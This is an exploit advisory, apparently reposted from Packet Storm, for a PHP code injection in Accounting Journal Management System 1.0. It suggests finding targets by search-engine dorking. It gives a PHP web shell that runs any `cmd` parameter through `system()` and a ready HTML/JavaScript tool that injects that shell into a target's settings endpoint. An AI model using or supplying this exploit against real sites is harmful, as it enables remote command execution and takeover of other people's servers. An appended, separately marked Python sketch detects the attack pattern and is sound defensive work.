Accounting Journal Management System 1.0 Code Injection exploit


## https://sploitus.com/exploit?id=PACKETSTORM:180251

=============================================================================================================================================
| # Title     : Accounting Journal Management System 1.0 PHP code injection Vulnerability                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip                                          |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] This payload injects code of your choice into an HTML page. You give it a name and save it in the root directory of the script, and it executes remotely.

[+] Line 11 : 'content[welcome]' = Replace "welcome" with any label you want.

[+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

[+] Save the payload as poc.html

[+] Set your target URL

[+] payload :

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title> PHP code injection Tool</title>
<script>
async function sendRequest() {
const url = document.getElementById('url').value;
const postData = {
'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
};
try {
const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: new URLSearchParams(postData).toString()
});
if (response.ok) {
document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';
} else {
document.getElementById('result').innerText = 'Error: ' + response.statusText;
}
} catch (error) {
document.getElementById('result').innerText = 'Error making request: ' + error.message;
}
}
</script>
</head>
<body>
<h1>Injection Tool</h1>
<form onsubmit="event.preventDefault(); sendRequest();">
<label for="url">Enter URL:</label>
<input type="text" id="url" name="url" required>
<button type="submit">Submit</button>
</form>
<pre id="result"></pre>
</body>
</html>
```

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
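A defensive detection sketch for the request pattern in the PoC above, added here as an example and not part of the original advisory: it flags `update_settings` POSTs whose `content[...]` fields carry a PHP open tag, and `cmd=` requests that follow from the same client. It assumes request bodies are available (for example from a WAF or reverse-proxy audit log); the record layout, the `/ajms/` path prefix and the sample records are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/classes/systemsettings.php"          # path from the PoC, lower-cased
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.I)  # <?php, <?= and short open tags
CONTENT_KEY = re.compile(r"content\[[^\]]*\]", re.I)

def injected_fields(method, target, body):
    """Names of content[...] fields in a settings update that carry a PHP open tag."""
    url = urlsplit(target)
    if method.upper() != "POST" or not url.path.lower().endswith(ENDPOINT):
        return []
    if parse_qs(url.query).get("f") != ["update_settings"]:
        return []
    form = parse_qs(body, keep_blank_values=True)
    return sorted(k for k, vals in form.items()
                  if CONTENT_KEY.fullmatch(k) and any(PHP_TAG.search(v) for v in vals))

def scan(records):
    """Return (index, reason) alerts. A cmd= request only alerts after an
    injection hit from the same client, to keep the second signal low-noise."""
    suspects = set()
    alerts = []
    for i, (client, method, target, body) in enumerate(records):
        fields = injected_fields(method, target, body)
        if fields:
            suspects.add(client)
            alerts.append((i, "php-in-" + ",".join(fields)))
        elif client in suspects and "cmd" in parse_qs(urlsplit(target).query):
            alerts.append((i, "cmd-after-injection"))
    return alerts

# Constructed sample records: (client, method, request target, urlencoded body)
SAMPLE = [
    ("198.51.100.7", "POST", "/ajms/classes/SystemSettings.php?f=update_settings",
     "name=AJMS&content%5Bwelcome%5D=%3Ch1%3EWelcome%3C%2Fh1%3E"),  # normal edit
    ("203.0.113.9", "POST", "/ajms/classes/SystemSettings.php?f=update_settings",
     "content%5Bwelcome%5D=%3C%3Fphp+echo+1%3B+%3F%3E"),            # PHP tag in field
    ("203.0.113.9", "GET", "/ajms/?cmd=ls+-al", ""),                 # follow-up request
    ("198.51.100.7", "GET", "/ajms/?cmd=help", ""),                  # unrelated client
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLE):
        print(index, reason)
```

The same field check belongs server-side as well: the settings handler should require an authenticated administrator session and should not write request-supplied markup into a file the PHP interpreter will execute.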